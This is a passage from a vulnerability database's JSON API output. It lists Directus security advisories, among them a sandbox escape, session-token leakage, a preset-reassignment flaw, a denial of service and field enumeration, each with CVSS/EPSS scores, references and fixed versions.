"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/commit/e288a43a79613dada905da683f4919c6965ac804" }, { "reference_url": "https://github.com/advisories/GHSA-pmf4-v838-29hg", "reference_id": "GHSA-pmf4-v838-29hg", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-pmf4-v838-29hg" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg", "reference_id": "GHSA-pmf4-v838-29hg", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-pmf4-v838-29hg" }, { "reference_url": "https://github.com/directus/directus/releases/tag/v11.2.0", "reference_id": "v11.2.0", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://github.com/directus/directus/releases/tag/v11.2.0" }, { "reference_url": "https://www.youtube.com/watch?v=DbV4IxbWzN4", "reference_id": "watch?v=DbV4IxbWzN4", "reference_type": "", "scores": [ { "value": "5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "5.0", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-01-23T18:52:42Z/" } ], "url": "https://www.youtube.com/watch?v=DbV4IxbWzN4" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/376928?format=api", "purl": "pkg:npm/directus@11.2.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-ghbw-eqaz-jqhs" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.2.0" } ], "aliases": [ "CVE-2025-24353", "GHSA-pmf4-v838-29hg" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-gf4m-ad8j-7bbn" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360871?format=api", "vulnerability_id": "VCID-jvtg-cnnb-7ubg", "summary": "Directus affected by VM2 sandbox escape vulnerability\n### Impact\nIn vm2 for versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the \"Run Script\" operation in flows being able to escape the sandbox running code in the main nodejs context.\n\n### Patches\nPatched in v10.6.0 by replacing `vm2` with `isolated-vm`\n\n### Workarounds\nNone\n\n### References\nhttps://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5", "references": [ { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058" }, { "reference_url": "https://github.com/directus/directus/pull/19332", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/pull/19332" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-22rr-f3p8-5gf8" }, { "reference_url": "https://github.com/advisories/GHSA-22rr-f3p8-5gf8", "reference_id": "GHSA-22rr-f3p8-5gf8", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-22rr-f3p8-5gf8" }, { "reference_url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5", "reference_id": "GHSA-cchq-frgv-rjh5", "reference_type": "", "scores": [ { "value": "7.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/32458?format=api", "purl": "pkg:npm/directus@10.6.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-eyv5-91cq-pyf9" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jy2x-jbbb-zua5" }, { "vulnerability": "VCID-nupg-ae85-dqaw" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u4er-eddz-g7aq" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v2je-s9mk-e3h1" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.6.0" } ], "aliases": [ "GHSA-22rr-f3p8-5gf8", "GMS-2023-2358" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jvtg-cnnb-7ubg" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/39732?format=api", "vulnerability_id": "VCID-jy2x-jbbb-zua5", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. When reaching the /files page, a JWT is passed via GET request. Inclusion of session tokens in URLs poses a security risk as URLs are often logged in various places (e.g., web server logs, browser history). Attackers gaining access to these logs may hijack active user sessions, leading to unauthorized access to sensitive information or actions on behalf of the user. This issue has been addressed in version 10.10.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28238", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25791", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25775", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.0009", "scoring_system": "epss", "scoring_elements": "0.25577", "published_at": "2026-06-11T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-28238" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28238", "reference_id": "CVE-2024-28238", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28238" }, { "reference_url": "https://github.com/advisories/GHSA-2ccr-g2rv-h677", "reference_id": "GHSA-2ccr-g2rv-h677", "reference_type": "", "scores": [ { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-2ccr-g2rv-h677" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677", "reference_id": "GHSA-2ccr-g2rv-h677", "reference_type": "", "scores": [ { "value": "2.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N" }, { "value": "LOW", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "LOW", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-02T19:50:33Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-2ccr-g2rv-h677" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/29718?format=api", "purl": "pkg:npm/directus@10.10.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pt9-wpk9-tfhj" }, { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qeh1-cm33-93g1" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-s39d-aw92-hydh" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.10.0" } ], "aliases": [ "CVE-2024-28238", "GHSA-2ccr-g2rv-h677" ], "risk_score": 1.4, "exploitability": "0.5", "weighted_severity": "2.7", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-jy2x-jbbb-zua5" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/50303?format=api", "vulnerability_id": "VCID-pvfa-xp3e-8kg2", "summary": "Directus v10.13.0 allows an authenticated external attacker to modify presets created by the same user to assign them to another user. This is possible because the application only validates the user parameter in the 'POST /presets'Â request but not in the PATCH request. When chained with CVE-2024-6533, it could result in account takeover.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-6534", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.1854", "published_at": "2026-06-13T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18518", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18356", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00058", "scoring_system": "epss", "scoring_elements": "0.18519", "published_at": "2026-06-12T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-6534" }, { "reference_url": "https://directus.io", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://directus.io" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://fluidattacks.com/advisories/capaldi", "reference_id": "capaldi", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/" } ], "url": "https://fluidattacks.com/advisories/capaldi" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534", "reference_id": "CVE-2024-6534", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-6534" }, { "reference_url": "https://directus.io/", "reference_id": "directus.io", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-08-15T14:09:09Z/" } ], "url": "https://directus.io/" }, { "reference_url": "https://github.com/advisories/GHSA-3fff-gqw3-vj86", "reference_id": "GHSA-3fff-gqw3-vj86", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3fff-gqw3-vj86" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86", "reference_id": "GHSA-3fff-gqw3-vj86", "reference_type": "", "scores": [ { "value": "4.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-3fff-gqw3-vj86" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/33133?format=api", "purl": "pkg:npm/directus@10.13.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.13.2" } ], "aliases": [ "CVE-2024-6534", "GHSA-3fff-gqw3-vj86" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-pvfa-xp3e-8kg2" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/41764?format=api", "vulnerability_id": "VCID-qeh1-cm33-93g1", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 10.11.2, providing a non-numeric length value to the random string generation utility will create a memory issue breaking the capability to generate random strings platform wide. This creates a denial of service situation where logged in sessions can no longer be refreshed as sessions depend on the capability to generate a random session ID. This vulnerability is fixed in 10.11.2.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2024-36128", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58146", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58141", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58028", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00353", "scoring_system": "epss", "scoring_elements": "0.58158", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2024-36128" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b", "reference_id": "7d2a1392f43613094de700062aba168a9400dd3b", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/" } ], "url": "https://github.com/directus/directus/commit/7d2a1392f43613094de700062aba168a9400dd3b" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36128", "reference_id": "CVE-2024-36128", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-36128" }, { "reference_url": "https://github.com/advisories/GHSA-632p-p495-25m5", "reference_id": "GHSA-632p-p495-25m5", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-632p-p495-25m5" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5", "reference_id": "GHSA-632p-p495-25m5", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-06-03T15:30:27Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-632p-p495-25m5" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/31918?format=api", "purl": "pkg:npm/directus@10.11.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-32e6-c1bv-efea" }, { "vulnerability": "VCID-3u2p-nh39-5qag" }, { "vulnerability": "VCID-45yr-y58u-aqb8" }, { "vulnerability": "VCID-4z1u-rtza-83bj" }, { "vulnerability": "VCID-54ja-4vrx-tbgm" }, { "vulnerability": "VCID-79ch-vtkp-q3cd" }, { "vulnerability": "VCID-8q3p-rrv2-jba5" }, { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-9r91-qgfa-x7ak" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-c4eu-udp3-uuen" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-dcw5-6ct3-b3ev" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-gf4m-ad8j-7bbn" }, { "vulnerability": "VCID-jtg3-4cp8-8fe6" }, { "vulnerability": "VCID-pvfa-xp3e-8kg2" }, { "vulnerability": "VCID-qfnx-egwg-ybgp" }, { "vulnerability": "VCID-qrf3-cz1h-8kau" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-rren-vtar-23fm" }, { "vulnerability": "VCID-snux-8b2e-9kd6" }, { "vulnerability": "VCID-t1by-h5au-rqbu" }, { "vulnerability": "VCID-tp8r-hnf7-fkaf" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ua8h-tmak-hufd" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v6mk-ybv3-tyc8" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-ywqb-qrvw-hfbh" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.11.2" } ], "aliases": [ "CVE-2024-36128", "GHSA-632p-p495-25m5" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-qeh1-cm33-93g1" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90513?format=api", "vulnerability_id": "VCID-qfnx-egwg-ybgp", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. A vulnerability in versions prior to 11.13.0 allows authenticated users to search concealed/sensitive fields when they have read permissions. While actual values remain masked (`****`), successful matches can be detected through returned records, enabling enumeration attacks on sensitive data. Version 11.13.0 fixes the issue.", "references": [ { "reference_url": 